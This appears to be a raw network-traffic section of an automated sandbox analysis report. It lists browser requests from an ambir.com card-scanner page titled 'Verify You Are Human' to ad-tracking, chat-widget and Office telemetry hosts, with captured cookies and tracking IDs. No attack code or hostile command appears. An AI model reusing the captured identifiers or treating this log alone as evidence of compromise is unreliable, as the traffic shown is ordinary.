      Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /pxl/iframe_content.html?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&advertisable=GXXT3DJJNNBKHGBC62RAND HTTP/1.1Host: x.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
      Source: global trafficHTTP traffic detected: GET /a/assets/v0/site/7486-534-10-2045.js?cb=2024-11-20 HTTP/1.1Host: static.olark.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jsclient-bucket5/application2.js?v=1732053196593 HTTP/1.1Host: static.olark.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /consent/check/GXXT3DJJNNBKHGBC62RAND?flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&_s=a60e6a62d132d36d1465029b174eaecd&_b=2 HTTP/1.1Host: d.adroll.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
      Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1070729751/?random=1732134510409&cv=11&fst=1732134510409&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725z8833545045za201zb833545045&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Verify%20You%20Are%20Human&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUmoPit_wuKy5uGRDlv_X4wH6-FpAjFhJzRLblBcJp6k4iBGwdMdGwKz_xDr
      Source: global trafficHTTP traffic detected: GET /nrpc/c?c=create&s=7486-534-10-2045&v=QnUrnKaYLl744rSP542fr0UBrj6a8ok0&i=tM65kxeIWm5Vcm4e542fr0UBjA8B6bor&g=ALL&q=precache038757109200029083&j=o0&version=loader-precache&xhttp=1&u=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&r=&ca=false&ru=false&ae= HTTP/1.1Host: knrpc.olark.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /segment/GXXT3DJJNNBKHGBC62RAND/PQV7D44IFRBCBMEQBHSAR6?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&cookie=&adroll_s_ref=&keyw=&p0=12769&adroll_external_data=&xa4=1&adroll_version=2.0 HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ambir.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
      Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /cm/b/out?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&advertisable=GXXT3DJJNNBKHGBC62RAND HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
      Source: global trafficHTTP traffic detected: GET /cm/experian/out?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&advertisable=GXXT3DJJNNBKHGBC62RAND HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
      Source: global trafficHTTP traffic detected: GET /segment/GXXT3DJJNNBKHGBC62RAND/PQV7D44IFRBCBMEQBHSAR6?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&cookie=&adroll_s_ref=&keyw=&p0=12769&adroll_external_data=&xa4=1&adroll_version=2.0 HTTP/1.1Host: d.adroll.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
      Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cm/g/out?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&advertisable=GXXT3DJJNNBKHGBC62RAND HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
      Source: global trafficHTTP traffic detected: GET /cm/index/out?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&advertisable=GXXT3DJJNNBKHGBC62RAND HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
      Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /igs?advertisable=GXXT3DJJNNBKHGBC62RAND&fpc=d3ee31a855380a6a19350bbaa666e259 HTTP/1.1Host: x.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://x.adroll.com/pxl/iframe_content.html?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&advertisable=GXXT3DJJNNBKHGBC62RANDAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
      Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /cm/l/out?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&advertisable=GXXT3DJJNNBKHGBC62RAND HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
      Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /idsync/ex/receive?partner_id=3521&partner_device_id=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&gdpr=0&gdpr_consent= HTTP/1.1Host: pixel.tapad.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rum?cm_dsp_id=105&external_user_id=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&expiration=1763670519 HTTP/1.1Host: dsum-sec.casalemedia.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /sync?dsp_id=44&user_id=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U HTTP/1.1Host: x.bidswitch.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /jsclient-bucket5/application2.js?v=1732053196593 HTTP/1.1Host: static.olark.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1070729751/?random=1732134510409&cv=11&fst=1732132800000&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725z8833545045za201zb833545045&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Verify%20You%20Are%20Human&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dw9e1PdsyI7wuLd16IwKyz0AWKTwtXMslm9ozPf-QjAljjWhy&random=452684057&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cm/n/out?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&advertisable=GXXT3DJJNNBKHGBC62RAND HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
      Source: global trafficHTTP traffic detected: GET /segment/GXXT3DJJNNBKHGBC62RAND/PQV7D44IFRBCBMEQBHSAR6?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&cookie=&adroll_s_ref=&keyw=&p0=12769&adroll_external_data=&xa4=1&adroll_version=2.0 HTTP/1.1Host: d.adroll.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513; receive-cookie-deprecation=1; receive-cookie-deprecation=1
      Source: global trafficHTTP traffic detected: GET /jsclient-bucket5/storage.html?v=1732053196593 HTTP/1.1Host: static.olark.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /attribution/trigger?fpc=d3ee31a855380a6a19350bbaa666e259&advertisable_eid=GXXT3DJJNNBKHGBC62RAND&conversion_type=PageView&conversion_value=0.0&currency=USC&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F HTTP/1.1Host: x.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
      Source: global trafficHTTP traffic detected: GET /pixel?google_sc&google_nid=artb&google_hm=FrHkntYnWZqMUnuWCtu4Pg HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUmoPit_wuKy5uGRDlv_X4wH6-FpAjFhJzRLblBcJp6k4iBGwdMdGwKz_xDr
      Source: global trafficHTTP traffic detected: GET /igs?advertisable=GXXT3DJJNNBKHGBC62RAND&fpc=d3ee31a855380a6a19350bbaa666e259 HTTP/1.1Host: x.adroll.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513; receive-cookie-deprecation=1
      Source: global trafficHTTP traffic detected: GET /idsync/ex/receive/check?partner_id=3521&partner_device_id=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&gdpr=0&gdpr_consent= HTTP/1.1Host: pixel.tapad.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TapAd_TS=1732134520945; TapAd_DID=fca0ae6b-4903-4b6e-b6de-6aa8c515508a
      Source: global trafficHTTP traffic detected: GET /rum?cm_dsp_id=105&external_user_id=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&expiration=1763670519&C=1 HTTP/1.1Host: dsum-sec.casalemedia.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CMID=Zz5GedHM6dcAABgsASJdbwAA; CMPS=3643; CMPRO=3643
